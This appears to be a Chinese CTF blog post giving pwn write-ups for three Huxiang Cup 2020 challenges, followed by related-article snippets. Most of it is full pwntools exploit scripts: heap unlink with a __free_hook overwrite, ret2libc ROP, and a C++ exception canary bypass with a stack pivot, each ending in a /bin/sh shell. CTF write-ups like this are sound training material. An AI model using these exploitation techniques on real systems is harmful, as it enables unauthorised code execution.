pwn-湖湘杯2020

最新推荐文章于 2024-09-17 22:31:12 发布
最新推荐文章于 2024-09-17 22:31:12 发布
阅读量539 收藏
点赞数
分类专栏: 题目 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/109401944
版权

这比赛神仙真多~~

babyheap

通过unsortbin伪造prev_szie,unlink,chunoverlop

from pwn import *
p=process('./bh')
elf=ELF('./bh')
libc=elf.libc
context.terminal=['tmux','splitw','-h']

def menu(idx):
    p.sendlineafter(">>",str(idx))
def add():
    menu(1)
def show(idx):
    menu(2)
    p.sendlineafter("index?\n",str(idx))
def edit(idx,size,payload):
    menu(3)
    p.sendlineafter("index?\n",str(idx))
    p.sendlineafter("Size:\n",str(size))
    p.sendafter("Content:\n",payload)
def delete(idx):
    menu(4)
    p.sendlineafter("index?\n",str(idx))
for i in range(12):
    add()
for i in range(7):
    delete(i)
delete(8)
delete(9)
delete(10)
#gdb.attach(p,'b *$rebase(0x000A06)')
#free(7)
for i in range(10):
    add()
for i in range(7):
    delete(i)
delete(8)
edit(9,0xf8,'a')
delete(10)
for i in range(8):
    add()
show(9)
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-0x10-96
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add()#9=10
delete(9)
edit(10,0x30,p64(free_hook))
add()
add()
edit(1,0x30,'/bin/sh\x00')
edit(12,0x30,p64(system))
delete(7)
p.interactive()

在这里插入图片描述

在这里插入图片描述

pwn_printf(VMpwn

一道经典的VMpwn,首先我们看到main函数的末尾有一个函数
在这里插入图片描述
我们肯定是要走到这里的肯定是要v12的的值小于0x20了前面一大堆格式化字符可以慢慢分析得到是一个
在这里插入图片描述
关注到rdx的值是由rdi传递过去的所以我们只要多加一次pop_rdi就可以控制rdx了然后就是ret2libc了


from pwn import *
context.terminal=['tmux','splitw','-h']

#sh=process('./pwn_printf')
p=remote('47.111.104.99',52606)
elf = ELF("./pwn_printf")
libc=elf.libc
pop_rdi=0x0000000000401213
p.recvuntil(0x56)
p.sendline("82")#1
sleep(0.2)
p.sendline("90")#2
sleep(0.2)
p.sendline("90")#3
sleep(0.2)
p.sendline("90")#4
sleep(0.3)
p.sendline("120")#5
sleep(0.2)
p.sendline("90")#6
sleep(0.2)
p.sendline("22")#7
sleep(0.2)
p.sendline("22")#8
sleep(0.2)
p.sendline("22")#9
sleep(0.2)
p.sendline("118")#10
sleep(0.2)
p.sendline("109")#11
sleep(0.2)
p.sendline("1")#12
sleep(0.2)
p.sendline("7")#13
sleep(0.2)
p.sendline("1")#14
sleep(0.2)
p.sendline("1")#15
sleep(0.2)
p.sendline("22")
payload = "doudou".ljust(8,'a')+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(pop_rdi)+p64(0x30)
p.sendline(payload)
p.recvuntil("\n")
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
payload="doudou".ljust(8,'a')+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()

blend pwn

考的是c++异常处理绕过canary,然后通过栈迁移来的到shell

rom pwn import *
context.terminal=['tmux','splitw','-h']
p=process('./blend_pwn')
#p=remote('47.111.104.169',57504)
elf=ELF('./blend_pwn')
libc=elf.libc

def menu(idx):
        p.sendlineafter('>',str(idx))

def show_name():
        #p.sendlineafter()
        menu(1)

def add(data):
        menu(2)
        p.sendlineafter(':',data)

def delete(idx):
        menu(3)
        p.sendlineafter('>',str(idx))

def show():
        menu(4)

def gift(data):
        menu(666)
        p.sendafter(':',data)

context(arch='amd64',os='linux')
p.sendlineafter(': ','%11$p')
#libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__libc_start_main']
#gdb.attach(p,'b *$rebase(0x0001181)')
show_name()
p.recvuntil('user:')
libcbase=int(p.recv(14),16)-libc.sym['__libc_start_main']-240
pop_rdi=libcbase+libc.search(asm('pop rdi\nret')).next()
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
bin_sh=libcbase+libc.search('/bin/sh').next()
one_gg = 0x4526a+libcbase
payload=p64(0)*5+p64(pop_rdi)+p64(bin_sh)+p64(system)*2
add(payload)
add("doudoudoudou")
delete(0)
delete(1)
show()
p.recvuntil('2:')
heap=u64(p.recv(6)+'\x00\x00')
log.success('libcbase: '+hex(libcbase))
log.success('heap: '+hex(heap))
payload='a'*0x20+p64(heap)
gdb.attach(p,'b *$rebase(0x0000012D0)')
gift("a"*0x20+p64(heap+0x30)+'\x1c')
log.success('o_g: '+hex(one_gg))
p.interactive()
print heap
湖湘2020
pwnyuan's blog
11-05 1118
湖湘2020BeforeMisc虚实之间思路CryptoLFSXOR描述源码思路EXP古典美++描述思路After Before 有幸作为队里挂件打了湖湘,好家伙,平台从下午开始就搞事情,我们藏了两flag,最后一直交不上,也不是交不上,是交上了,不亮,不给分,吓得我们最后不怎么做了,就疯狂交flag,淦 Misc 另外passwd和隐藏的秘密,是内存取证,我不会用volatility,这两题是队友写的 我还在复现,不是,是在学习怎么使用他 虚实之间 思路 打开发现要密码,直接拉到ARCHPR里面爆破
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4998
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
2020湖湘 wp
weixin_46330722的博客
11-02 1996
2020湖湘 wpweb题目名字不重要反正题挺简单的NewWebsite 今天打了下湖湘,签到选手上线。 web 题目名字不重要反正题挺简单的 题目源码 <?php error_reporting(0); //I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker. if ( isset($_GET['file']) ) { $file = $_GET
菜鸟笔记之PWN入门(1.0.0)前言
最新发布
XiDPPython的博客
09-17 885
PWN是黑客术语中的俚语,是指攻破设备或者系统。它的发音类似于“砰”,当然也有师傅把它叫作“胖”。PWN 的目标是获取系统的控制权或执行未经授权的操作。
pwn
weixin_42072280的博客
05-13 627
pwn 参考:百度百科 ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了。 pip安装时报错Cannot uninstall 'pyserial'. It is a distutils installed project and thus we...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
2020年第六届“湖湘”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
【标题】: 2020年第六届“湖湘”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 【描述】: 这个压缩包文件包含了2020年第六届“湖湘”网络安全技能大赛洞庭决赛中,互联网选拔赛第二场的线上CTF...
湖湘hxb_pwn
Trick的博客
11-08 187
湖湘hxb_pwn pwn_printf pwn_libc ida 16次循环 下面if判断v12<=0x20 所以写 for i in range(16): n.sendline("32") 跟进if下面的函数 这里变量的栈是空栈0h,所以offset只需要64bit程序的8个就行。 再然后a * a1,所以传参需要double 0x20,也就是0x40 ROPgadget --binary pwn_printf 找到pop_rdi_ret的地址 复习一下libc64_payload公式
2020湖湘CTF选拔赛部分wp
../../../../../../../
11-02 1994
Misc Misc1 颜文字之谜 提示说颜文字夺走了flag,Wireshark打开流量包,发现了一串base64隐写编码 导出转换 (。・∀・)ノ゙嗨Hi~ (@_@;)(@_@;)(@_@;) (+_+)?(。>︿<)_θ(。>︿<)_θ o(* ̄▽ ̄*)ブ゜ <(^-^)>(╯▽╰ )好香~~ ヽ(✿゚▽゚)ノ(@^0^) (^^ゞΨ( ̄∀ ̄)Ψ*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。 ~\(≧▽≦)/~o(^▽^)o(¬‿¬)(*≧︶≦))( ̄▽ ̄* )ゞ┳━┳(╯‵
PWN(一)
weixin_44169596的博客
01-21 3774
1. 安装pwntools工具: pwntools是什么? pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,基本涵盖了pwn题利用脚本所需要的各种工具。 安装过程: sudo apt install python3-pip sudo python3 -m pip install --upgrade --force pip sudo pip install setuptools==33.1.1 sudo pip3 install
pwn2020GEEKPWN复现
weixin_43960998的博客
07-05 458
      参考师傅的博客,复现一手2020GEEKPWN。 1、babypwn 思路:       1)fb 泄漏 heap_base,通过堆溢出修改 size,释放进 ub,泄漏 libc       2)然后 ub attack,这里学到 ub attack 并不一定要分配,因为漏洞发生在解链,所以只要在 ub 中发生解链即
湖湘2020 easyre wp
苗_的博客
11-10 493
很久没有写题解博客了,最近忙着学习深度学习= =,湖湘这道题还是不错的,可以锻炼一下自己动态调试的能力,所以刚好在练习的过程中记录一下,方便以后回顾: 首先拿到文件,查壳发现无壳,运行一下大概就是先判断长度,再判断是否是正确flag: 长度错误就输出wrong length并退出。 拿到ida里看一下,发现没有很明显的入口函数,查找字符串找到input your flag:,找到主函数位置 f5看一下,发现没办法反编译,所以我们就直接上动态调试吧: 在0x40DA40下断点(f2),f8单步
2020 湖湘 PWN WriteUp
SkYe's Blog
11-11 746
比赛的时候出去玩了,这就来复盘 babyheap 基本情况 增删查改,数量限制比较宽松挺大的,大小固定 0xf8 。 漏洞 safe_read 写入大小为 0xf8 会溢出修改下一个 chunk size 最低两位为 \x00 。 char *__fastcall safe_read(char *ptr, int size) { char *result; // rax read(0, ptr, 0xF0uLL); result = &ptr[size]; .
pwn(究极入门)
热门推荐
sjt670994562的博客
08-01 1万+
不能说是逆向转pwn吧,主要是想拓展一下,这两者之间的关系也挺大的 1.攻防世界-when_did_you_born 除去连上就有flag,这个应该就是最简单的题目了吧 惯例,checksec,这里有四种保护机制,有大佬的链接,这个要弄很清楚,尤其是PIE,以后慢慢来吧 https://www.jianshu.com/p/8a9ef7205632 没有PIE和FORTIFY(这边作者也不是太懂,...
pwn(安装环境)
2302_80935968的博客
05-08 1097
在终端命令框中输入sudo passwd root后会让你输入kali的默认密码kali,然后会提示你输入一个新的密码,在输入过程中输入的密码不会像一般的设置密码一样显示,再按照提示输入一遍就可以了,完成后可以输入su root切换成root用户了。俗话说的好,静态调试看IDA,动态调试看pwngdb(其实动态调试也能用IDA啦),pwngdb可以帮助你在可执行文件执行的时候查看各种寄存器的值,以及函数地址和偏移量,甚至可以让你一条汇编语言一条汇编语言分析,是分析程序不可或缺的工具。
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值